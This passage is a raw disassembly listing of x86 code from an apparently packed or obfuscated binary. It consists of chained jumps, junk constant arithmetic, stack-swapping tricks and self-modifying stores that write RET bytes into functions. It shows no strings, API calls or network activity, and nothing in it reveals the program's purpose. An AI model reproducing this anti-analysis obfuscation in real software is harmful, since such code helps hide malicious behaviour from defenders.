loc_459545:				; CODE XREF: hvvrg7ie:004530ECj
		rol	edx, 1Dh
		xor	edx, 0A51BF3DFh
		push	edx
		pushf
		jmp	loc_453FAA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DB4C

loc_459555:				; CODE XREF: sub_43DB4C+15838j
		test	edx, esi
		jmp	loc_443A11
; END OF FUNCTION CHUNK	FOR sub_43DB4C
; ---------------------------------------------------------------------------

loc_45955C:				; CODE XREF: hvvrg7ie:004453B5j
		or	ebx, 0A7A351B3h
		mov	edx, ebx

loc_459564:				; CODE XREF: hvvrg7ie:loc_43ED86j
		mov	eax, [esp]
		push	eax
		push	43E8C4BAh
		xchg	edi, [esp]
		mov	eax, edi
		jmp	loc_447AEC
; ---------------------------------------------------------------------------
		ror	edi, 15h
		add	esi, ebx
		jmp	sub_4401DB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4404E7

loc_459581:				; CODE XREF: sub_4404E7+8j
		jz	loc_454F69
		jmp	loc_44B7B2
; END OF FUNCTION CHUNK	FOR sub_4404E7
; ---------------------------------------------------------------------------

loc_45958C:				; CODE XREF: hvvrg7ie:00456087j
		sbb	esi, edi
		jmp	loc_449F77

; =============== S U B	R O U T	I N E =======================================



sub_459593	proc near		; CODE XREF: sub_441DF2+1p
					; hvvrg7ie:004522F1j

; FUNCTION CHUNK AT 00456204 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		lea	eax, sub_458E44
		mov	byte ptr [eax],	0C3h
		jmp	loc_456204
sub_459593	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4595A5:				; CODE XREF: hvvrg7ie:0043C8C0j
		xchg	ebp, [edi]
		and	ecx, eax
		add	ecx, ebp
		jmp	loc_4408D0
; ---------------------------------------------------------------------------

loc_4595B0:				; CODE XREF: hvvrg7ie:0043A88Bj
		xchg	ebp, ebx

; =============== S U B	R O U T	I N E =======================================



sub_4595B2	proc near		; CODE XREF: sub_43D30A:loc_45A40Ap

; FUNCTION CHUNK AT 004563F6 SIZE 00000006 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		rol	eax, 12h
		jmp	loc_4563F6
sub_4595B2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CA4B

loc_4595BE:				; CODE XREF: sub_44CA4B-ED7Bj
					; sub_44CA4B:loc_44CA5Aj
		push	18F68FA5h
		pop	eax
		xor	eax, 5C66928Dh
		or	eax, 242B3672h
		sub	eax, 9BB4EE26h
		cmp	eax, 949B9955h
		jmp	loc_454A1B
; END OF FUNCTION CHUNK	FOR sub_44CA4B
; ---------------------------------------------------------------------------

loc_4595E1:				; CODE XREF: hvvrg7ie:0043E756j
		shr	ebx, 16h

; =============== S U B	R O U T	I N E =======================================



sub_4595E4	proc near		; CODE XREF: sub_440C05+Bp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 004442E0 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00449F1C SIZE 00000008 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		xchg	esi, [esp-4+arg_0]
		mov	ebx, esi
		pop	esi
		mov	eax, [esp-8+arg_4]
		push	ecx
		jmp	loc_4442E0
sub_4595E4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4595F7:				; CODE XREF: hvvrg7ie:00455C72j
		jns	loc_459A81
		jno	locret_445161
		sub	ebx, edx
		jmp	loc_43A9BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403B6

loc_45960A:				; CODE XREF: sub_4403B6+36ADj
		jnz	loc_43D50F
		jmp	loc_459DFA
; END OF FUNCTION CHUNK	FOR sub_4403B6
; ---------------------------------------------------------------------------
		rol	edx, 1Dh
		jmp	sub_43B8A5
; ---------------------------------------------------------------------------
		or	esi, edx
		test	edi, esi
		jmp	loc_452FAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D37

loc_459626:				; CODE XREF: sub_454D37:loc_43F52Bj
		pop	ecx
		add	ecx, 5923B20h
		and	ecx, ds:4000F9h
		or	ecx, 52CC6FDEh
		xor	ecx, 0AE024D4Ah
		add	ecx, 0B75F98Dh
		jmp	loc_43EE9F
; END OF FUNCTION CHUNK	FOR sub_454D37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BEBB

loc_45964A:				; CODE XREF: sub_44BEBB:loc_447447j
		pop	ebp
		add	ecx, 0DF4CD270h
		sub	ecx, 8752960Ch
		and	ecx, 0F22C0372h
		jmp	loc_448E83
; END OF FUNCTION CHUNK	FOR sub_44BEBB
; ---------------------------------------------------------------------------

loc_459662:				; CODE XREF: hvvrg7ie:loc_444025j
		pop	edx
		sub	edx, 778CF46Ch
		add	edx, 94554F1Eh
		xchg	edx, [esp]
		jmp	loc_44E375
; ---------------------------------------------------------------------------
		mov	edx, 7DA6ACC0h
		call	sub_446A16
		push	esi
		push	eax
		jmp	loc_439310

; =============== S U B	R O U T	I N E =======================================



sub_459688	proc near		; CODE XREF: sub_43E7F3+7097p
		xchg	ebx, [esp+0]
		pop	ebx
		pop	ebp
		retn
sub_459688	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_45968E:				; CODE XREF: sub_444BE1+2A93j
		jmp	loc_43ED73
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440E5A

loc_459693:				; CODE XREF: sub_440E5A+7j
		jmp	loc_4464F0
; END OF FUNCTION CHUNK	FOR sub_440E5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403D4

loc_459698:				; CODE XREF: sub_4403D4+3j
		jmp	loc_441570
; END OF FUNCTION CHUNK	FOR sub_4403D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E7F3

loc_45969D:				; CODE XREF: sub_43E7F3+708Fj
		mov	eax, [ebp+var_4]
		mov	al, [eax]
		sub	al, 99h
		jmp	loc_43E184
; END OF FUNCTION CHUNK	FOR sub_43E7F3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_367. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4596AA:				; CODE XREF: hvvrg7ie:0044EA77j
		jmp	loc_43D01C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EBB6

loc_4596AF:				; CODE XREF: sub_43EBB6+C5E5j
		jmp	loc_43D9BE
; END OF FUNCTION CHUNK	FOR sub_43EBB6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450590

loc_4596B4:				; CODE XREF: sub_450590:loc_457673j
		add	edi, 289AEAEDh
		sub	eax, edi
		pop	edi
		push	esi

loc_4596BE:				; CODE XREF: hvvrg7ie:loc_442347j
		pushf
		push	0DE9ACE8Eh
		jmp	loc_44E2CD
; END OF FUNCTION CHUNK	FOR sub_450590
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_4596C9:				; CODE XREF: sub_454099-4A85j
		jns	loc_439D7A
		add	edi, 4000B979h
		jnb	loc_453444

loc_4596DB:				; CODE XREF: sub_454099:loc_447317j
		push	0
		push	0
		push	eax
		push	0F607E405h
		pop	eax
		jmp	loc_43FBC0
; END OF FUNCTION CHUNK	FOR sub_454099

; =============== S U B	R O U T	I N E =======================================



sub_4596EB	proc near		; DATA XREF: sub_449785-227Eo

; FUNCTION CHUNK AT 00448856 SIZE 00000005 BYTES

		push	eax
		mov	edx, eax
		jmp	loc_448856
sub_4596EB	endp

; ---------------------------------------------------------------------------

loc_4596F3:				; CODE XREF: hvvrg7ie:0045732Dj
		mov	edx, ds:dword_43A968
		or	edx, edx
		jmp	loc_45AAF0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_459700:				; CODE XREF: sub_43E128:loc_448220j
		and	eax, edx
		jz	loc_43C801
		jmp	loc_44E4AC
; END OF FUNCTION CHUNK	FOR sub_43E128

; =============== S U B	R O U T	I N E =======================================



sub_45970D	proc near		; CODE XREF: hvvrg7ie:004460E8j
					; sub_4485A2p

; FUNCTION CHUNK AT 004479DB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451B09 SIZE 00000018 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	eax
		push	9BACB73Fh
		jmp	loc_451B09
sub_45970D	endp

; ---------------------------------------------------------------------------

loc_45971C:				; CODE XREF: hvvrg7ie:00457341j
		jz	loc_446B36
		jmp	loc_450261
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_38. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_459728:				; CODE XREF: hvvrg7ie:00441C92j
		jmp	loc_4526B4
; ---------------------------------------------------------------------------

loc_45972D:				; CODE XREF: hvvrg7ie:00443740j
		shr	ebp, 1Eh
		adc	esi, ebp
; START	OF FUNCTION CHUNK FOR sub_453422

loc_459732:				; CODE XREF: sub_453422:loc_443725j
		and	edx, 0A7159868h
		call	sub_44004A

loc_45973D:				; CODE XREF: sub_457F50+1F44j
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_453422
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EBB6

loc_459742:				; CODE XREF: sub_43EBB6+CA03j
		jmp	loc_454F5F
; END OF FUNCTION CHUNK	FOR sub_43EBB6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D4EF

loc_459747:				; CODE XREF: sub_44D4EF-D9FAj
		jmp	loc_4546E2
; END OF FUNCTION CHUNK	FOR sub_44D4EF

; =============== S U B	R O U T	I N E =======================================



sub_45974C	proc near		; CODE XREF: hvvrg7ie:0044140Ej
					; sub_44B1C6:loc_455EFEp

; FUNCTION CHUNK AT 0044585E SIZE 00000014 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	edx
		push	6A8ECFBAh
		pop	edx
		jmp	loc_44585E
sub_45974C	endp

; ---------------------------------------------------------------------------
		jmp	ds:off_41D0B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_459762:				; CODE XREF: sub_448BC0+4A8Fj
		jmp	loc_45B5C4
; END OF FUNCTION CHUNK	FOR sub_448BC0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E68D

loc_459767:				; CODE XREF: sub_441167:loc_439CD8j
					; hvvrg7ie:loc_44F4A8j	...
		jo	loc_4585FC
		xchg	ebp, [esp+0]
		mov	edx, ebp
		pop	ebp
		mov	eax, [esp-4+arg_0]
		push	ebx
		xor	ebx, esi
		jmp	loc_454173
; END OF FUNCTION CHUNK	FOR sub_44E68D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_45977E:				; CODE XREF: sub_44616F:loc_455B97j
		mov	eax, [eax]
		cmp	byte ptr [eax],	0
		jnz	loc_45531B
		jmp	loc_44D3D1
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------
		test	ecx, 0DE3F779h
		jmp	loc_440E54
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_459799:				; CODE XREF: sub_454099-CB98j
		jz	loc_456DFA
		jmp	loc_44BAAB
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------

loc_4597A4:				; CODE XREF: hvvrg7ie:004446E4j
		jnb	loc_44C4AD
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_4597AA:				; CODE XREF: sub_43C811:loc_4446C9j
		add	edx, 600D4BBBh
		add	edx, ebp
		add	edx, 34ABC4Bh
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_43A38B
; END OF FUNCTION CHUNK	FOR sub_43C811
; ---------------------------------------------------------------------------
		pop	ebx
		jmp	sub_45B5DC
; ---------------------------------------------------------------------------
		call	sub_4480B3
; START	OF FUNCTION CHUNK FOR sub_455DA8

loc_4597CE:				; CODE XREF: sub_455DA8+Dj
		jmp	loc_43BC96
; END OF FUNCTION CHUNK	FOR sub_455DA8
; ---------------------------------------------------------------------------

loc_4597D3:				; CODE XREF: hvvrg7ie:loc_43ACB7j
		jmp	loc_45AA81
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_4597D8:				; CODE XREF: sub_44D2F8+7F8Fj
		pop	ecx
		cmp	ebp, eax
		jmp	loc_45457E
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------

locret_4597E0:				; CODE XREF: hvvrg7ie:0044CCDBj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_4597E1:				; CODE XREF: sub_4465A6:loc_44DD7Bj
		jnz	loc_44799C
		jmp	loc_4542C0
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4419C0

loc_4597EC:				; CODE XREF: sub_4419C0+19j
		call	sub_441B2C

loc_4597F1:				; CODE XREF: hvvrg7ie:00442CE9j
		push	687B5B1Eh
		pop	edi
		or	edi, ds:4000F5h
		xor	edi, 0A4D64D4Ch
		or	edi, ds:4000F2h
		test	edi, 200h
		jmp	loc_43ADFF
; END OF FUNCTION CHUNK	FOR sub_4419C0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E1C

loc_459814:				; CODE XREF: sub_451E1C:loc_44F24Aj
					; hvvrg7ie:0044F264j
		xor	ebx, 0CB3B0D80h
		xor	eax, ebx
		pop	ebx

loc_45981D:				; CODE XREF: hvvrg7ie:loc_45B999j
		rol	eax, 3
		push	edx
		push	3E10D584h

loc_459826:				; CODE XREF: hvvrg7ie:loc_4533ECj
		pop	edx
		jmp	loc_44DF6A
; END OF FUNCTION CHUNK	FOR sub_451E1C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D574

loc_45982C:				; CODE XREF: sub_43D574+Bj
		mov	edi, edx
		push	offset sub_4469CC
		jmp	nullsub_370
; END OF FUNCTION CHUNK	FOR sub_43D574

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_459838	proc near		; CODE XREF: sub_43D980+F907j
		retn
sub_459838	endp

; ---------------------------------------------------------------------------

loc_459839:				; CODE XREF: hvvrg7ie:0043DD0Dj
		jmp	loc_43BC50
; ---------------------------------------------------------------------------

loc_45983E:				; CODE XREF: hvvrg7ie:004482BDj
		and	esi, ebp
		add	edi, ecx
		add	eax, 3EE9D7B7h
		jmp	loc_43E682
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B7CB

loc_45984D:				; CODE XREF: sub_44B7CB-AF75j
		jnp	loc_44B4EA

loc_459853:				; CODE XREF: sub_44B7CB:loc_452909j
		mov	ecx, [ebp-1Ch]
		and	ecx, 7
		mov	eax, 1
		jmp	loc_4520F1
; END OF FUNCTION CHUNK	FOR sub_44B7CB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_197. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440195

loc_459864:				; CODE XREF: sub_440195+5CE4j
		jmp	loc_445AFF
; END OF FUNCTION CHUNK	FOR sub_440195
; ---------------------------------------------------------------------------
		jmp	ds:off_41D048
; ---------------------------------------------------------------------------

loc_45986F:				; CODE XREF: hvvrg7ie:00455145j
		jmp	loc_44B1A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452585

loc_459874:				; CODE XREF: sub_452585-BA82j
		jmp	loc_4400B7
; END OF FUNCTION CHUNK	FOR sub_452585
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D23

loc_459879:				; CODE XREF: sub_454D23-16228j
		jmp	loc_44E4BE
; END OF FUNCTION CHUNK	FOR sub_454D23
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_45987E:				; CODE XREF: sub_44616F:loc_440C88j
					; hvvrg7ie:loc_448846j	...
		xchg	edi, [esp+4+var_4]
		mov	edx, edi
		pop	edi

loc_459884:				; CODE XREF: hvvrg7ie:loc_439B71j
		jo	loc_447C82
		mov	eax, [esp+0]
		jmp	loc_453971
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4589D3

loc_459892:				; CODE XREF: hvvrg7ie:004422E6j
					; sub_4589D3+6j
		xchg	eax, [esp+0]
		mov	edx, eax
		call	sub_456DE7
		xchg	eax, [esp+0]
		mov	edx, eax
		pop	eax
		pop	eax
		mov	ds:dword_43A968, edx
		jmp	loc_456FC9
; END OF FUNCTION CHUNK	FOR sub_4589D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440603

loc_4598AE:				; CODE XREF: sub_440603+14446j
					; hvvrg7ie:00454A61j
		sub	edx, 75570FAAh
		add	edx, 6DE6A85Fh
		xchg	edx, [esp+4+var_4]
		jmp	loc_43A797
; END OF FUNCTION CHUNK	FOR sub_440603
; ---------------------------------------------------------------------------
		test	al, al
		jz	nullsub_291
		jmp	loc_44FE4E

; =============== S U B	R O U T	I N E =======================================



sub_4598CF	proc near		; CODE XREF: sub_44BEBB:loc_447442p
					; hvvrg7ie:00450550j
		xchg	ebx, [esp+0]
		pop	ebx
		call	sub_45471C
		retn
sub_4598CF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_4598D9:				; CODE XREF: sub_43C0DE+BC43j
		jmp	loc_4451C9
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580B4

loc_4598DE:				; CODE XREF: sub_4580B4:loc_44CA11j
		xchg	ebx, [esp-4+arg_0]
		ror	eax, 12h
		push	edi
		push	0D66260E5h
		pop	edi
		add	edi, 0D813F2D9h
		sub	edi, 94CD3432h
		add	edi, 0C5DA4B83h
		jmp	loc_444347
; END OF FUNCTION CHUNK	FOR sub_4580B4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4462F9

loc_459902:				; CODE XREF: sub_4462F9:loc_45310Dj
		jnz	loc_43CA15
		jmp	loc_43F00C
; END OF FUNCTION CHUNK	FOR sub_4462F9
; ---------------------------------------------------------------------------
		jmp	ds:off_41D074
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_459913:				; CODE XREF: sub_43E063+1444Dj
		jmp	nullsub_466
; END OF FUNCTION CHUNK	FOR sub_43E063
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E533

loc_459918:				; CODE XREF: sub_45B261-1DBD2j
					; sub_449885+2513j ...
		jz	loc_44BD9D
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_43C836
		push	93DC3CFCh
		jmp	loc_444DCD
; END OF FUNCTION CHUNK	FOR sub_44E533

; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn


sub_459932	proc near		; CODE XREF: sub_43E128+6A20j
		retn
sub_459932	endp

; ---------------------------------------------------------------------------

loc_459933:				; CODE XREF: hvvrg7ie:0044E7B0j
		test	ebp, ecx
		jmp	loc_45B882
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440AD9

loc_45993A:				; CODE XREF: sub_440AD9:loc_44673Dj
		jnz	loc_450880

loc_459940:				; CODE XREF: sub_449C58+B3C0j
		jmp	loc_442948
; END OF FUNCTION CHUNK	FOR sub_440AD9
; ---------------------------------------------------------------------------
		test	edx, ebp
		jmp	loc_43D23A
; ---------------------------------------------------------------------------

loc_45994C:				; CODE XREF: hvvrg7ie:loc_44DAA9j
		or	eax, eax
		jnz	loc_443707
		jmp	loc_43E7B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AE37

loc_459959:				; CODE XREF: sub_44AE37:loc_4426AAj
		jl	loc_458071

loc_45995F:				; CODE XREF: hvvrg7ie:0043B465j
		jmp	loc_45616C
; END OF FUNCTION CHUNK	FOR sub_44AE37
; ---------------------------------------------------------------------------
		cdq
		jmp	loc_45806E
; ---------------------------------------------------------------------------
		mov	[ebp+0], esi
		jmp	loc_45ADC9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4590E0

loc_459972:				; CODE XREF: sub_4590E0:loc_452BE0j
		or	ebx, 0DAEBA0E3h
		add	ebx, 2030BF88h
		add	ebx, ebp
		add	ebx, 0E4E3947Dh
		mov	[ebx], eax
		jmp	loc_45AB64
; END OF FUNCTION CHUNK	FOR sub_4590E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440B13

loc_45998D:				; CODE XREF: sub_440B13+6DAEj
					; sub_440B13+B2EBj
		add	ecx, 0C091F37Bh
		xor	ecx, ds:4000F4h
		rol	ecx, 8
		add	ecx, 6FD82073h
		xchg	ecx, [esp+0Ch+var_C]
		jmp	loc_43B76D
; END OF FUNCTION CHUNK	FOR sub_440B13
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DE0A

loc_4599AA:				; CODE XREF: sub_44DE0A+11j
		call	sub_45A98D
		cmp	ds:dword_45388C, 0
		jnz	loc_43C4A2
		lea	edx, [ebp+var_14]
		mov	eax, offset dword_453890
		call	sub_456DE7
		push	offset sub_4546F5
		jmp	loc_440580
; END OF FUNCTION CHUNK	FOR sub_44DE0A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446F91

loc_4599D3:				; CODE XREF: sub_446F91:loc_4409CDj
		add	edi, 0A681DBD8h
		popf
		xchg	edi, [esp+0]
		jmp	loc_43BEAF
; END OF FUNCTION CHUNK	FOR sub_446F91
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D98D

loc_4599E2:				; CODE XREF: sub_44D98D-B80j
		push	17C39C04h
		jmp	loc_452D6A
; END OF FUNCTION CHUNK	FOR sub_44D98D

; =============== S U B	R O U T	I N E =======================================



sub_4599EC	proc near		; DATA XREF: sub_455DCC:loc_44C493o
		push	6601526Dh
		pop	eax
		and	eax, 41CDA47h
		sub	eax, 0C3CF01CAh
		jmp	loc_44F645
sub_4599EC	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_459A03:				; CODE XREF: sub_45A234:loc_452761j
		jz	sub_4501A9
		jmp	loc_4436E9
; END OF FUNCTION CHUNK	FOR sub_45A234
; ---------------------------------------------------------------------------

loc_459A0E:				; CODE XREF: hvvrg7ie:00459E9Ej
		adc	esi, edi

; =============== S U B	R O U T	I N E =======================================



sub_459A10	proc near		; CODE XREF: sub_43F227:loc_452179p

; FUNCTION CHUNK AT 00457E5B SIZE 0000001D BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		call	sub_43D16B
		push	4FF952B9h
		jmp	loc_457E5B
sub_459A10	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44955C

loc_459A23:				; CODE XREF: sub_44955C:loc_440619j
		jnz	loc_45B41C
		jmp	loc_454C01
; END OF FUNCTION CHUNK	FOR sub_44955C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_459A2E:				; CODE XREF: sub_450434-104A6j
		jl	loc_441204
		rol	eax, 1Dh
		add	ebp, edx
		cmp	edx, 229EE787h
		jmp	loc_44EA8B
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_459A44:				; CODE XREF: sub_44E3B3-1BCCj
		jz	loc_43F289

loc_459A4A:				; CODE XREF: sub_44E3B3:loc_44802Cj
		mov	eax, [ebp-24h]
		push	0E6AF601Ah
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; START	OF FUNCTION CHUNK FOR sub_440643

loc_459A52:				; CODE XREF: sub_440643:loc_43BE30j
		pop	ecx
		or	ecx, 822AEF8Bh
		add	ecx, 939FD32Bh
		add	ecx, eax
		add	ecx, 85B03D3Eh
		jmp	loc_44A45D
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456FF3

loc_459A6C:				; CODE XREF: sub_456FF3:loc_456FFEj
		push	edx
		jmp	loc_4528D7
; END OF FUNCTION CHUNK	FOR sub_456FF3
; ---------------------------------------------------------------------------

loc_459A72:				; CODE XREF: hvvrg7ie:0044BDB3j
		rol	eax, 0Dh
		and	eax, 2CDACA5Fh
		sub	eax, 0D6942313h

loc_459A81:				; CODE XREF: hvvrg7ie:loc_4595F7j
		or	eax, ds:4000F9h
		add	eax, 0C0766DC4h
		xchg	eax, [esp]
		jmp	loc_449E32

; =============== S U B	R O U T	I N E =======================================



sub_459A95	proc near		; CODE XREF: hvvrg7ie:0043D59Bj
					; hvvrg7ie:00441D98j ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043CCDC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442144 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044749F SIZE 00000024 BYTES
; FUNCTION CHUNK AT 004474D1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458069 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	ebp
		mov	ebp, esp
		push	ecx
		push	1572A4F1h
		jmp	loc_4474D1
sub_459A95	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456763

loc_459AA7:				; CODE XREF: sub_456763:loc_45676Fj
		pop	ebp
		push	2BA3E56Eh
		pop	eax
		rol	eax, 0Eh
		add	eax, 0DE8CDED9h
		or	eax, 651E94E8h
		add	eax, 844CFD7h
		call	sub_44D4EF

loc_459AC8:				; CODE XREF: sub_453BBD-9D3Ej
		jmp	loc_444465
; END OF FUNCTION CHUNK	FOR sub_456763
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451669

loc_459ACD:				; CODE XREF: sub_451669+6CB7j
		jl	loc_440664

loc_459AD3:				; CODE XREF: sub_44A9E2+12j
		jmp	loc_44B4EA
; END OF FUNCTION CHUNK	FOR sub_451669
; ---------------------------------------------------------------------------
		dd 0CEA1870Fh, 7FE9FFFFh
		db 88h,	0FEh, 0FFh
; ---------------------------------------------------------------------------

loc_459AE3:				; CODE XREF: hvvrg7ie:0044B4A7j
		jno	loc_43DECF

loc_459AE9:				; CODE XREF: hvvrg7ie:00450E50j
		xor	eax, 18FC09B8h
		call	sub_450C5A
		mov	ds:dword_41D190, eax
		lea	eax, nullsub_492
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_492
; ---------------------------------------------------------------------------
		call	nullsub_471
		jmp	loc_43B871
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403B6

loc_459B12:				; CODE XREF: sub_4403B6:loc_43B876j
		xor	edi, 4D8D8FA8h
		add	edi, 673485F8h
		xor	edi, 68201738h
		add	eax, edi
		pop	edi
		push	edi
		jmp	loc_454DF6
; END OF FUNCTION CHUNK	FOR sub_4403B6

; =============== S U B	R O U T	I N E =======================================



sub_459B2D	proc near		; DATA XREF: sub_455ADC-1BBC9o

; FUNCTION CHUNK AT 00439270 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044950A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045068C SIZE 0000000B BYTES

		add	esi, 0D20F209Ch
		mov	[esi], eax
		pop	esi
		cmp	dword ptr [ebp-4], 0
		jz	loc_441477
		jmp	loc_45068C
sub_459B2D	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_459B45	proc near		; CODE XREF: hvvrg7ie:0043BA80j
					; sub_453405-39C7p

; FUNCTION CHUNK AT 00439E38 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004415ED SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00446621 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C0B1 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044CC02 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044E971 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044F386 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458394 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458D7C SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	41CF8524h
		pop	edx
		rol	edx, 0Ch
		jmp	loc_44CC02
sub_459B45	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450810

loc_459B57:				; CODE XREF: sub_450810-EA8Aj
		pop	edi
		rol	eax, 13h
		cmp	eax, 0EF82CEBAh
		jmp	loc_43AC25
; END OF FUNCTION CHUNK	FOR sub_450810
; ---------------------------------------------------------------------------

loc_459B66:				; CODE XREF: hvvrg7ie:00447596j
		jnz	loc_456BF6
		jmp	loc_45629C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440402

loc_459B71:				; CODE XREF: sub_440402+B62Ej
		inc	eax
		mov	[ebp-24h], eax
		mov	dword ptr [ebp-18h], 0

loc_459B7C:				; CODE XREF: sub_4563DC:loc_458945j
		mov	eax, [ebp-14h]
		mov	eax, [eax+20h]
		add	eax, [ebp-4]
		xor	edx, edx
		jmp	loc_449930
; END OF FUNCTION CHUNK	FOR sub_440402
